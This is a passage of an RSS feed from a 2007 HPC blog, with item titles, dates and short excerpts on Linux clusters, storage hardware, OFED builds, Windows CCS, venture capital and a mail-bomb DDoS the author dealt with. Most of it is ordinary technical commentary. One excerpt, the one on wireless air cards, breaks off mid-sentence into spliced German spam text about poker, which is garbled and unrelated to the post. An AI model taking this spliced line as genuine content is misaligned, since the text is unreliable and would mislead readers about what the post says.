      <link>https://blog.scalability.org/2007/08/why-something-other-than-windows-is-likely-to-win-the-desktops/</link>
      <pubDate>Tue, 07 Aug 2007 22:31:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/why-something-other-than-windows-is-likely-to-win-the-desktops/</guid>
      <description>&amp;hellip; or how to bring a really fast desktop to its knees. I have desktop unit with Windows XP pro on it. It is my primary windows xp box. It is a nice 2+ GHz Athlon 64 with 1.5 GB ram. Pretty fast SATA disks. Single core, but quite fast. Or so I thought.
I like to listen to internet radio while I work. Helps drown out the server noise. So I have winamp in a corner, playing something at low volume.</description>
    </item>
    
    <item>
      <title>Counter-attacking DDoS: something that works</title>
      <link>https://blog.scalability.org/2007/08/counter-attacking-ddos-something-that-works/</link>
      <pubDate>Tue, 07 Aug 2007 15:25:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/counter-attacking-ddos-something-that-works/</guid>
      <description>Yesterday I told you that we were under a mail-bomb DDoS. Message rates of about 147 per minute. As our normal rate is 1-2 messages per minute, this was a 100x or more increase. Not against our normal domain name, but against one that we host. One that doesn&amp;rsquo;t have a web site. And has one email user. Obviously the people who did this are really, terribly smart. Oh yes. (keyboard dripping with sarcasm).</description>
    </item>
    
    <item>
      <title>I don&#39;t get it ... no really, I don&#39;t</title>
      <link>https://blog.scalability.org/2007/08/i-dont-get-it-no-really-i-dont/</link>
      <pubDate>Tue, 07 Aug 2007 02:57:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/i-dont-get-it-no-really-i-dont/</guid>
      <description>Why on earth would someone launch a DDoS against us (technically a domain we host)? It is in progress right now. Main attack vector is via email/spam bots. If anyone out there wants me to gather specific data on the attack, please let me know. Pretty good logging of most things here. According my trusty mail meter, we have repelled something like 0.2M emails in one day. Ballpark of 145 messages per minute.</description>
    </item>
    
    <item>
      <title>Ya turns yer back fer justa minute ...</title>
      <link>https://blog.scalability.org/2007/08/ya-turns-yer-back-fer-justa-minute/</link>
      <pubDate>Mon, 06 Aug 2007 06:33:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/ya-turns-yer-back-fer-justa-minute/</guid>
      <description>[in his best Brooklyn accent] &amp;hellip; and stuff happens. /. linked to a story on supercomputing procurement. The article is in the New York Times, and it is worth a read.
Short version is that the procurement appears to have been decided 4 years in advance, and the NSF will give the DOE the machine. Well, this assumes that the reporting is in fact correct. My own experience with various media interactions tends to suggest that misquoting/rewording and semantic shift are the norm, not the exception.</description>
    </item>
    
    <item>
      <title>When kernel module builds (and installs) go (horribly) wrong</title>
      <link>https://blog.scalability.org/2007/08/when-kernel-module-builds-and-installs-go-horribly-wrong/</link>
      <pubDate>Fri, 03 Aug 2007 16:59:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/08/when-kernel-module-builds-and-installs-go-horribly-wrong/</guid>
      <description>Built a new 2.6.22.1 kernel. Testing it for many things. Looks good overall, though it broke a few things when I first built it. Had to get the latest subsystem patches. Ok. I decided to use this as &amp;ldquo;the&amp;rdquo; kernel for all we are working on. Dog-food it. Put it on my laptop as well. (BTW: if anyone out there knows how to force a driver into windows, I am trying to load the AHCI driver into XP, so I can switch the system into a much faster disk mode &amp;hellip; Dell likes loading it in ATA mode, and it is slower as a result &amp;hellip; worse, XP refuses to load the driver when presented with it &amp;hellip; I need to force this to happen &amp;hellip; pointers welcome &amp;hellip; might just have to reload XP, but I would prefer to avoid the pleasure of doing this &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Mostly OT from HPC:  Wireless air cards</title>
      <link>https://blog.scalability.org/2007/07/mostly-ot-from-hpc-wireless-air-cards/</link>
      <pubDate>Wed, 01 Aug 2007 02:58:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/mostly-ot-from-hpc-wireless-air-cards/</guid>
      <description>I just picked up a Verizon Wireless PCMCIA air card to go with the new Dell laptop. The HPC connection comes from this being the unit I take with me on-site. The wireless card is a PCMCIA unit, the PC5750. It is basically a PCMCIA -&amp;gt; USB bridge for a modem. I installed the Verizon software in the windows XP portion (didn&amp;rsquo;t check to see if it works in XP x64, which I had been still considering reloadingPfennige bezitzen einen zu hohen wertlos Charakter und poker spiel.</description>
    </item>
    
    <item>
      <title>An omen, or a taste of things to come</title>
      <link>https://blog.scalability.org/2007/07/an-omen-or-a-taste-of-things-to-come/</link>
      <pubDate>Tue, 31 Jul 2007 03:53:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/an-omen-or-a-taste-of-things-to-come/</guid>
      <description>I got an interesting letter in the mail today. It was a somewhat &amp;hellip; well &amp;hellip; cheesy looking letter from the USPTO (US Patent and Trademark office) indicating that a patent which was applied for 7 years ago, was finally awarded. Patent number 7,249,357 if you are interested. I won&amp;rsquo;t comment on the substance of the patent. The group I worked with was absolutely top notch, and an it was an honor to be associated with them.</description>
    </item>
    
    <item>
      <title>High user loads</title>
      <link>https://blog.scalability.org/2007/07/high-user-loads/</link>
      <pubDate>Wed, 25 Jul 2007 21:32:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/high-user-loads/</guid>
      <description>Sorry folks, huge demand for my cycles. Has effectively stopped me from having time to write the followup bits. Will do soon.</description>
    </item>
    
    <item>
      <title>TCO: The sorta kinda but not-really argument,  part 1 (the TCO study)</title>
      <link>https://blog.scalability.org/2007/07/tco-the-sorta-kinda-but-not-really-argument-part-1-the-tco-study/</link>
      <pubDate>Sat, 21 Jul 2007 20:52:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/tco-the-sorta-kinda-but-not-really-argument-part-1-the-tco-study/</guid>
      <description>One of the more annoying parts of writing stuff for consumption online is that, every now and then, someone with an agenda, a very obvious agenda, will go off with weak arguments. One of those weak arguments that we saw yesterday was TCO. Not that TCO is a minor concern, it is a real, significant concern for management. How much something costs in the end is a sorely needed datum for any enterprise, company, entity, to make rational and realistic decisions.</description>
    </item>
    
    <item>
      <title>Oh whatta day: the fisking</title>
      <link>https://blog.scalability.org/2007/07/oh-whatta-day-the-fisking/</link>
      <pubDate>Sat, 21 Jul 2007 03:35:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/oh-whatta-day-the-fisking/</guid>
      <description>Yesterday, I commented on a puff piece article on Windows CCS. Go ahead and read it, the article and the commentary. This morning, I saw a comment on this same article from John at InsideHpc.com. I disagreed with John&amp;rsquo;s premise, and wrote a long article discussing this. While I respect John, I do disagree with him. But I will do so respectfully. The rest of this article will be &amp;hellip; sarcastic &amp;hellip; flippant &amp;hellip; and I am going to fisk the fisking post that was derived from John&amp;rsquo;s on another site.</description>
    </item>
    
    <item>
      <title>Rumor:  Crosswalk is done</title>
      <link>https://blog.scalability.org/2007/07/rumor-crosswalk-is-done/</link>
      <pubDate>Fri, 20 Jul 2007 15:59:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/rumor-crosswalk-is-done/</guid>
      <description>Robin at Storagemojo (great blog, read it religiously) says he had heard a rumor. Yeah, I should invoke the 24 hour rule. If you are at Crosswalk, and it is still going, please let him (and me) know.
Robin makes a great point there
Well, ok, I take a little issue with it in that the performance driven folks now realize that stability is critical to performance. Scaling up on a bleeding edge is a sure way to have lots of down time.</description>
    </item>
    
    <item>
      <title>Will CCS dominate all?</title>
      <link>https://blog.scalability.org/2007/07/will-ccs-dominate-all/</link>
      <pubDate>Fri, 20 Jul 2007 12:58:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/will-ccs-dominate-all/</guid>
      <description>John West asks this question in a short article on HPCWire. In it he posits a few things. It is worth looking into them.
First, his title is provocative, &amp;ldquo;Windows CCS and the End of *nix in HPC&amp;rdquo;. Not that this is an issue, he needs to draw readers in. Second, he shows what he is interpreting to be the fundamental conflict, that is, between end users who just want to get things done, as typified in his quote from the person who bought a windows cluster, and Don Becker, who did a pretty good job of jump starting the industry.</description>
    </item>
    
    <item>
      <title>Yet another puff piece ...</title>
      <link>https://blog.scalability.org/2007/07/yet-another-puff-piece/</link>
      <pubDate>Thu, 19 Jul 2007 01:50:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/yet-another-puff-piece/</guid>
      <description>On windows clusters. They quote Don Becker, cluster illuminati, who made some quite pointed and correct observations. They quoted some marketing types from other organizations who don&amp;rsquo;t appear to be technical, and don&amp;rsquo;t grasp what &amp;ldquo;hard to install&amp;rdquo; actually means.
Aside from that, one of the least painful aspects of a cluster is &amp;ldquo;how hard it is to install&amp;rdquo;. The most painful is the cost of running it, specifically managing users, and applications.</description>
    </item>
    
    <item>
      <title>Download 5 years of your life ...</title>
      <link>https://blog.scalability.org/2007/07/download-5-years-of-your-life/</link>
      <pubDate>Fri, 13 Jul 2007 01:44:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/download-5-years-of-your-life/</guid>
      <description>or mine as it turns out. Found this via a link from Google Scholar. I was looking for the HMMer acceleration paper, specifically to see if it had been cited, and found my thesis. The HPC connection has to do with the amount of simulation that went into the calculations. Way back in the good old days, 64 atom supercells took 1 week for 100 time steps on the machines we had (borrowed SGI R3000&amp;rsquo;s).</description>
    </item>
    
    <item>
      <title>Guide to getting OFED 1.2 to build on OpenSuSE</title>
      <link>https://blog.scalability.org/2007/07/guide-to-getting-ofed-12-to-build-on-opensuse/</link>
      <pubDate>Sun, 08 Jul 2007 14:24:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/guide-to-getting-ofed-12-to-build-on-opensuse/</guid>
      <description>Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here, place it in the OFED-1.2 directory as root on your machine mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h Then run the build_new.sh. Voila. Works. Binary RPMs are here.</description>
    </item>
    
    <item>
      <title>gpt installs in OpenSuSE 10.2 ... grrrrrr</title>
      <link>https://blog.scalability.org/2007/07/gpt-installs-in-opensuse-102-grrrrrr/</link>
      <pubDate>Fri, 06 Jul 2007 00:42:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/gpt-installs-in-opensuse-102-grrrrrr/</guid>
      <description>Suppose you have a x86_64 box, I dunno, able to put 8+TB usable in 3U. Suppose you want to load OpenSuSE 10.2 on it. Suppose you want to keep the partitioning simple, and not do any fancy tricks to eek out another few percentage of performance, so you build your RAID6 with 2 hot spares. Now you have this big hunk-a-chunk-a disk. Now install OpenSuSE 10.2 on it. After you are done you discover &amp;hellip;.</description>
    </item>
    
    <item>
      <title>More about adoption</title>
      <link>https://blog.scalability.org/2007/07/more-about-adoption/</link>
      <pubDate>Wed, 04 Jul 2007 00:54:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/more-about-adoption/</guid>
      <description>Again, coming back to this, adoption rates are critical. I appreciate Patrick&amp;rsquo;s point from post 306 that Microsoft doesn&amp;rsquo;t release this data. In reading around Ken Farmer&amp;rsquo;s excellent www.winhpc.org site (sister to his excellent www.linuxhpc.org) site, I found a link to this article. I recommend reading the whole thing. Especially page 2. Here is a quote.
The next portion of that paragraph is not something I understand.
Uh, sure. Not clear on what this means.</description>
    </item>
    
    <item>
      <title>A storage question</title>
      <link>https://blog.scalability.org/2007/07/a-storage-question/</link>
      <pubDate>Wed, 04 Jul 2007 00:07:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/a-storage-question/</guid>
      <description>What would be &amp;ldquo;game changing&amp;rdquo; for you in your storage? That is, what would enable you to do things, or think of things in a completely different way if only X was true? What is X?
The reason I ask this is that in short order, the Seagate 1TB drives are going to be out. I want to know if anyone thinks that this density of drive is game changing. 1000 of these drives is 1PB.</description>
    </item>
    
    <item>
      <title>Developer Targeted Platforms</title>
      <link>https://blog.scalability.org/2007/07/developer-targeted-platforms/</link>
      <pubDate>Tue, 03 Jul 2007 23:54:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/developer-targeted-platforms/</guid>
      <description>As I have pointed out before, without real adoption data, it is hard to gauge whether customers are really interested in a particular platform. We know server adoption data for Linux with reasonable accuracy. At last glance it is large, and rapidly growing, outpacing the market growth, and its rivals growth. This tends to have secondary effects, on to those in a moment.
We do not know desktop usage growth across the market in any detail.</description>
    </item>
    
    <item>
      <title>Still working on getting Tiburon out the door</title>
      <link>https://blog.scalability.org/2007/07/still-working-on-getting-tiburon-out-the-door/</link>
      <pubDate>Tue, 03 Jul 2007 04:59:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/still-working-on-getting-tiburon-out-the-door/</guid>
      <description>in beta form. Tiburon is the open source based framework we are using to load our clusters: computing and storage, and provide modular interfaces to manage the systems. Basically if you are deploying more then 2 nodes, or two JackRabbits, you should not, ever, have to load each system and configure it. This should be automated. But done so in an intelligent manner.
And this is where I am thinking that the compute job ASL might have an analog in a management ASL.</description>
    </item>
    
    <item>
      <title>Whither X-RAID (by Apple)</title>
      <link>https://blog.scalability.org/2007/07/whither-x-raid-by-apple/</link>
      <pubDate>Mon, 02 Jul 2007 00:05:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/whither-x-raid-by-apple/</guid>
      <description>We have had a number of discussions with customers on X-RAID and related systems from Apple. Apple pioneered good low cost storage. Wasn&amp;rsquo;t terribly fast, but it came in around $2-3/GB or so. Last I priced something out for a customer it was ballpark of $2.75/GB. FWIW: JackRabbit is in the low $1.x/GB. I haven&amp;rsquo;t heard much new about X-RAID recently. Then a blog I like reading had a post about iPhone.</description>
    </item>
    
    <item>
      <title>Why we are where we are in the VC world</title>
      <link>https://blog.scalability.org/2007/07/why-we-are-where-we-are-in-the-vc-world/</link>
      <pubDate>Sun, 01 Jul 2007 22:26:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/why-we-are-where-we-are-in-the-vc-world/</guid>
      <description>Marc Andreessen (you should have an idea who he is if you have used a web browser at some point in your life) has an excellent post on his blog discussing the &amp;ldquo;why we are here&amp;rdquo; situation. Specific to VC and their investments. Well worth a read. Between this and TheFunded, some overall good reading for prospective, current, and former entrepreneurs, wondering, aloud sometimes in blogs, WTF &amp;hellip;</description>
    </item>
    
    <item>
      <title>Dude ... I got a Dell ...</title>
      <link>https://blog.scalability.org/2007/07/dude-i-got-a-dell/</link>
      <pubDate>Sun, 01 Jul 2007 21:03:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/07/dude-i-got-a-dell/</guid>
      <description>laptop that is. Long story. Took me too long to make up my mind (more than 96 hours). At the end of the day the issue for me was not price but specific features functionality and performance. Yeah, so I am atypical.
The major contenders were IBM/Lenovo, HP, Dell, Alienware, Sager/Clevo, and one or two others. No, I did not give Apple a serious look. To be frank, I can&amp;rsquo;t stand OSX.</description>
    </item>
    
    <item>
      <title>ASLs as a meta-language for cluster jobs</title>
      <link>https://blog.scalability.org/2007/06/asls-as-a-meta-language-for-cluster-jobs/</link>
      <pubDate>Fri, 29 Jun 2007 14:52:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/asls-as-a-meta-language-for-cluster-jobs/</guid>
      <description>Short post. I was having a conversation on how to do some things on a cluster, and an idea was born. I&amp;rsquo;ll flesh it out a little more later on, but the gist is, can we create an application specific language (platform independent, for the hordes of windows cluster users in addition to the Linux cluster groups) to handle job flow? Right now, the vast majority of queuing systems launch shell scripts.</description>
    </item>
    
    <item>
      <title>Tech support in olden times</title>
      <link>https://blog.scalability.org/2007/06/tech-support-in-olden-times/</link>
      <pubDate>Fri, 29 Jun 2007 14:45:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/tech-support-in-olden-times/</guid>
      <description>Yeah, I have days like this too &amp;hellip;</description>
    </item>
    
    <item>
      <title>Nice site on VCs</title>
      <link>https://blog.scalability.org/2007/06/nice-site-on-vcs/</link>
      <pubDate>Thu, 28 Jun 2007 15:47:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/nice-site-on-vcs/</guid>
      <description>Have a look at TheFunded. Personally I think the current model of pitching one after another ad nausem may be inefficient. Knowing what we are getting into ahead of time with VCs is helpful.
Its a shame that there is no real disinterested systematic vetting of business plans such that we can create a more efficient market for capital, by providing well vetted/organized/thought out business plans, and a relevant group of good VCs.</description>
    </item>
    
    <item>
      <title>Experimental change</title>
      <link>https://blog.scalability.org/2007/06/experimental-change/</link>
      <pubDate>Thu, 28 Jun 2007 12:21:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/experimental-change/</guid>
      <description>Turned required registration off for comments. I want to see if our spam filters will stop the spam before it gets posted. If any shows up, it will be deleted. I want this blog to be open and bidirectional. I don&amp;rsquo;t want it to become a repository for suppository advertising. If it works, we will keep it this way. If it doesn&amp;rsquo;t we will revert to registration for comments. This has little to do with our gentle and numerous readers, it has more to do with whether or not we have the abusers appropriately fenced off.</description>
    </item>
    
    <item>
      <title>Ethics and blogging</title>
      <link>https://blog.scalability.org/2007/06/ethics-and-blogging/</link>
      <pubDate>Thu, 28 Jun 2007 12:13:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/ethics-and-blogging/</guid>
      <description>Saw this article linked from/. In it there was an indication that Microsoft paid some bloggers to write up stuff which later became quotes. Bloggers got income, Microsoft got leverage their quotes and their names. But is this ethical?
First off, Scalability.org is not an ad-supported site. We don&amp;rsquo;t run ads. We have pretty good traffic for a small blog, but this is not anyone&amp;rsquo;s day job. The only thing it really costs me is time, and it is pretty minimal in the bigger scheme of things.</description>
    </item>
    
    <item>
      <title>Good news on JackRabbit front</title>
      <link>https://blog.scalability.org/2007/06/good-news-on-jackrabbit-front/</link>
      <pubDate>Thu, 28 Jun 2007 04:53:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/good-news-on-jackrabbit-front/</guid>
      <description>The day job has signed up with an excellent partner to help grow the market for reliable and fast HPC storage servers. We have two partners in the US, one in India, and we are still working on the EU &amp;hellip; Update: Working with them on fixing the pricing, it appears to be off. Thanks for letting me know.</description>
    </item>
    
    <item>
      <title>Writing with a broken laptop</title>
      <link>https://blog.scalability.org/2007/06/writing-with-a-broken-laptop/</link>
      <pubDate>Thu, 28 Jun 2007 04:36:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/writing-with-a-broken-laptop/</guid>
      <description>Well, the laptop is not broken, but the USB ports are. Which means my mouse doesn&amp;rsquo;t work. So I have to use the track pad. Which means as I type my mouse pointer jumps all over the place.
Owie. Going to buy a new laptop soon anyway. Wish someone had a quad core out there (big evil grin) with 4 GB RAM, super nice nVidia graphics, 15.4 inch screen, 160 GB SATA 7200 RPM drive.</description>
    </item>
    
    <item>
      <title>I hope this is not a mistake in the 1TB drive spec&#39;s from Seagate</title>
      <link>https://blog.scalability.org/2007/06/i-hope-this-is-not-a-mistake-in-the-1tb-drive-specs-from-seagate/</link>
      <pubDate>Wed, 27 Jun 2007 14:28:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/i-hope-this-is-not-a-mistake-in-the-1tb-drive-specs-from-seagate/</guid>
      <description>Go have a look at the specs. Specifically at the read and write seek latencies.
Everyone say it with me now &amp;hellip;. oooooohhhhhhhhhh aaaaaaahhhhhhhh. If this is the case, then 15kRPM FC/SCSI is pretty much over. These units come in SAS and SATA at these densities. JackRabbit will be quite happy.</description>
    </item>
    
    <item>
      <title>ISC 07</title>
      <link>https://blog.scalability.org/2007/06/isc-07/</link>
      <pubDate>Wed, 27 Jun 2007 13:43:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/isc-07/</guid>
      <description>Wish I was there. Have an injured foot, recovering slowly. Not sure what I did. Aside from that, costs to fly into Dresden were huge. Looked at Frankfurt, Berlin, Prague &amp;hellip; Ugh. Maybe next year. Microsoft PR sent me some information pointers, I invited them to post here. Hopefully they will. I want adoption numbers. Looking over the PR and thinking it through, if they were having a massive adoption, I think that would be what they would talk about.</description>
    </item>
    
    <item>
      <title>Issues in HPC as a business: a view as a small solutions provider</title>
      <link>https://blog.scalability.org/2007/06/issues-in-hpc-as-a-business-a-view-as-a-small-solutions-provider/</link>
      <pubDate>Wed, 27 Jun 2007 12:11:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/issues-in-hpc-as-a-business-a-view-as-a-small-solutions-provider/</guid>
      <description>One of the things all HPC vendors have to deal with is competition. This is fine, doesn&amp;rsquo;t worry me. Fair competition can be quite good, and even exciting. Its the unfair competition that bugs me.
Suppose we have a potential customer X. Said customer works with us, we generate benchmark data, show them what we can do with well tuned systems. Customer likes it. Asks us for a quote. We provide one, and the price is good.</description>
    </item>
    
    <item>
      <title>An upswell of interest in many core workstations</title>
      <link>https://blog.scalability.org/2007/06/an-upswell-of-interest-in-many-core-workstations/</link>
      <pubDate>Wed, 27 Jun 2007 12:04:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/an-upswell-of-interest-in-many-core-workstations/</guid>
      <description>At my day job, we have delivered a number of dual processor workstations to customers over the years with really nice nVidia graphics. Recently, a customer bought 2 4-core workstations, really nice nVidia graphics, and 32 GB ram, with 1 TB RAID disk. Then another asked for 4-core and 8-core workstations, which we provided. Now one of our larger customers is asking for 8-core and 16-core workstations with 32 GB ram.</description>
    </item>
    
    <item>
      <title>Convergence and diversification</title>
      <link>https://blog.scalability.org/2007/06/convergence-and-diversification/</link>
      <pubDate>Wed, 27 Jun 2007 11:56:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/convergence-and-diversification/</guid>
      <description>The market has been consolidating behind various OSes for a while. Reducing the number of ports reduces ISV costs. It reduces end user management headache. Curiously enough it also reduces the engineering costs of the relevant hardware vendors, but don&amp;rsquo;t tell a few of them that, as they still perceive value where they feel they can be different. Unfortunately I have a sense of mayhem in two of the converged OSes, Linux and Windows.</description>
    </item>
    
    <item>
      <title>Patch for OFED-1.2 build on OpenSUSE 10 with a nice updated kernel</title>
      <link>https://blog.scalability.org/2007/06/patch-for-ofed-12-build-on-opensuse-10-with-a-nice-updated-kernel/</link>
      <pubDate>Mon, 25 Jun 2007 20:56:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/patch-for-ofed-12-build-on-opensuse-10-with-a-nice-updated-kernel/</guid>
      <description>Tracking this one down was fun. It turns out someone, either in SuSE-land or Linux-land, has decided that HZ is a dangerous macro to expose to users. Dangerous. Therefore, they wrap it in a kernel cloak. Which has the net effect of breaking large swaths of code which happen to use the quite innocuous HZ macro. Grrrrrr.
digging through and dereferencing all the included header files I found this &amp;hellip; ` #ifndef _ASMx86_64_PARAM_H #define _ASMx86_64_PARAM_H #ifdef KERNEL</description>
    </item>
    
    <item>
      <title>This one hurts</title>
      <link>https://blog.scalability.org/2007/06/this-one-hurts/</link>
      <pubDate>Sun, 24 Jun 2007 19:49:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/this-one-hurts/</guid>
      <description>Working on simplifying and refactoring some Makefiles for DragonFly. Yeah, will mention what it is eventually. In the makefile, I build a bunch of perl modules. The previous version of this system had a pre-pulled set of CPAN modules, and all the bits had file system names like DBIx-SimplePerl-1.8.tar.gz Which is nice and easy to deal with. In order to make sure we can use this for updating as well, I thought it would be nice to exploit CPAN and the module name without the version.</description>
    </item>
    
    <item>
      <title>Re-inventing wheels</title>
      <link>https://blog.scalability.org/2007/06/re-inventing-wheels/</link>
      <pubDate>Thu, 21 Jun 2007 21:11:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/re-inventing-wheels/</guid>
      <description>Why does SuSE insist on re-inventing wheels that others have done a far better job of inventing? I don&amp;rsquo;t get it. Specifically I am referring to not using yum in favor of their zypper and zmd and &amp;hellip;
C&amp;rsquo;mon SuSE, get with the program. Use yum. So we can stop messing around with yet-another-broken-thing-that-promises-to-be-better-someday. The yum &amp;ldquo;packaged&amp;rdquo; with SuSE is old, and broken. Worse, it sometimes, mysteriously fails. And even worse, it is effectively impossible to upgrade to the latest version.</description>
    </item>
    
    <item>
      <title>Accidental profound wisdom</title>
      <link>https://blog.scalability.org/2007/06/accidental-profound-wisdom/</link>
      <pubDate>Thu, 21 Jun 2007 03:12:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/accidental-profound-wisdom/</guid>
      <description>Well, this might not be the most appropriate title for this. I need to explain this, but first let me point to the article/email in question. Now that I have pointed to it, I want to note that there is a deeply profound set of statements in this email, which seems to be a series of responses to a discussion. Bear with me.
In this email, Linus Torvalds discusses some things about the licensing of Linux.</description>
    </item>
    
    <item>
      <title>Article up at Linux Magazine HPC site</title>
      <link>https://blog.scalability.org/2007/06/article-up-at-linux-magazine-hpc-site/</link>
      <pubDate>Thu, 21 Jun 2007 02:22:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/article-up-at-linux-magazine-hpc-site/</guid>
      <description>See here. Though apart from getting the author mixed up with the editor &amp;hellip;</description>
    </item>
    
    <item>
      <title>Just too funny</title>
      <link>https://blog.scalability.org/2007/06/just-too-funny/</link>
      <pubDate>Thu, 21 Jun 2007 00:48:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/just-too-funny/</guid>
      <description>I do quite a bit of Perl programming work in support of our products. Perl is sometimes (mistakenly IMO) called a scripting language; it may have been designed to handle that in the past, but it has evolved over the decades into something far more powerful. But it also has this &amp;hellip; well &amp;hellip; implicit sense of humor about it. Maybe this is what pisses off people advocating other programming languages.</description>
    </item>
    
    <item>
      <title>The data is coming, the data is coming</title>
      <link>https://blog.scalability.org/2007/06/the-data-is-coming-the-data-is-coming/</link>
      <pubDate>Mon, 18 Jun 2007 04:43:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/the-data-is-coming-the-data-is-coming/</guid>
      <description>I&amp;rsquo;ve been talking for the better part of the last decade about one of the more serious problems looming for HPC, and frankly for all computing. Call it a data deluge or exponential data growth, whatever you would like. At the end of the day it means that you have more data than before, and it is growing faster than you think. Usually much faster than Moore&amp;rsquo;s law which gives you an order of magnitude about every 6 years.</description>
    </item>
    
    <item>
      <title>Tiburon nearly ready for beta</title>
      <link>https://blog.scalability.org/2007/06/tiburon-nearly-ready-for-beta/</link>
      <pubDate>Fri, 15 Jun 2007 17:01:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/tiburon-nearly-ready-for-beta/</guid>
      <description>Installer works. Load a compute node mostly automagically (one step by hand during debugging phase, could automate this trivially) with OpenSuSE 10.2 x86_64, OFED 1.2-rc4, &amp;hellip; sets up and configures addresses, mount points, user authentication (using NIS for the moment, anything we can script should work fine, LDAP would be preferred eventually), cluster queuing, yadda yadda yadda. The goal is to enable load/configure of any OS using PXEboot, without imaging. Some folks like imaging.</description>
    </item>
    
    <item>
      <title>Catfight at the LKML corral</title>
      <link>https://blog.scalability.org/2007/06/catfight-at-the-lkml-corral/</link>
      <pubDate>Wed, 13 Jun 2007 13:57:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/catfight-at-the-lkml-corral/</guid>
      <description>ok, not really. Linus stated some things in a post to the linux kernel mailing list. IMO he is spot on. Jonathan&amp;rsquo;s reply is what I expect from a CEO.
Our experience in trying to work with Sun has been one of them pushing Solaris as the solution for everything, even when customers (and resellers in our case) spec&amp;rsquo;ed designs using Linux as the customers preferred. Solaris is not being targeted by many new ISVs or IHVs, Linux is.</description>
    </item>
    
    <item>
      <title>OT from HPC: Michigan economy</title>
      <link>https://blog.scalability.org/2007/06/ot-from-hpc-michigan-economy/</link>
      <pubDate>Wed, 13 Jun 2007 13:10:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/ot-from-hpc-michigan-economy/</guid>
      <description>Being a Michigander, I have an interest in seeing Michigan grow and thrive. This is a very nice state; there are many positive aspects to it. Apart from some union rules and the proclivity of our state government to tax, it is a good place to set up and run a business. Costs are low, burn rates are low, and relative to the rest of the country, salaries and home prices are lower.</description>
    </item>
    
    <item>
      <title>The virtues of test-driven methodology in program development</title>
      <link>https://blog.scalability.org/2007/06/the-virtues-of-test-driven-methodology-in-program-development/</link>
      <pubDate>Tue, 12 Jun 2007 12:38:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/the-virtues-of-test-driven-methodology-in-program-development/</guid>
      <description>Short post, directly related to HPC. Short version: When developing new features for a program, routine, method, whatever, it is a good idea to test it how you think you will use it.
Ok. This is a dumb one. Working on our Tiburon installer. Will help with managing clusters of things. Like Linux/other compute clusters. And JackRabbits (storage clusters). Part of the installer makes use of a Perl module I wrote named DBIx::SimplePerl.</description>
    </item>
    
    <item>
      <title>A little PXE dust here and there</title>
      <link>https://blog.scalability.org/2007/06/a-little-pxe-dust-here-and-there/</link>
      <pubDate>Mon, 11 Jun 2007 04:21:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/a-little-pxe-dust-here-and-there/</guid>
      <description>I now have a reasonable version of our Tiburon project installer working. Integrates a number of things via PXE boot. Had abandoned pxegrub in large part due to the grub team abandoning (for the most part) grub v0.9x (aka stuff that worked ok) in favor of the great big redesign and reimplementation (which doesn&amp;rsquo;t seem to be working).
Don Becker, networking/clustering guru had warned of seriously borked PXE implementations in hardware, and how the interacted, badly, with TFTP.</description>
    </item>
    
    <item>
      <title>OFED 1.2 on OpenSuSE 10.2</title>
      <link>https://blog.scalability.org/2007/06/ofed-12-on-opensuse-102/</link>
      <pubDate>Fri, 08 Jun 2007 13:17:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/ofed-12-on-opensuse-102/</guid>
